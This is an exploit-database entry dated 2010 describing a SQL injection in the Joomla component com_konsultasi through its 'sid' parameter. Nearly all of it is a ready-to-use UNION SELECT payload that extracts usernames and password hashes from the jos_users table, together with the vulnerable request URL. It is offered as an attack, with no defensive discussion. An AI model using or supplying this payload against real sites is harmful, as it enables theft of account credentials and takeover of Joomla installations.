Joomla Component com_konsultasi (sid) SQL Injection Vulnerability

2010-05-13T00:00:00
ID 1337DAY-ID-12227
Type zdt
Reporter c4uR
Modified 2010-05-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================================================
Joomla Component com_konsultasi (sid) SQL Injection Vulnerability
=================================================================

Author      : c4uR
Date        : May, 13, 2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
-------------------------------------------------------------------------
 
Esploit :
----------
 
-5/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--
 
SQLi p0c :
-----------
 
http://127.0.0.1/[gubrak]/index.php?option=com_konsultasi&act=detail&sid=[gubrak]
-------------------------------------------------------------------------



#  0day.today [2018-01-02]  #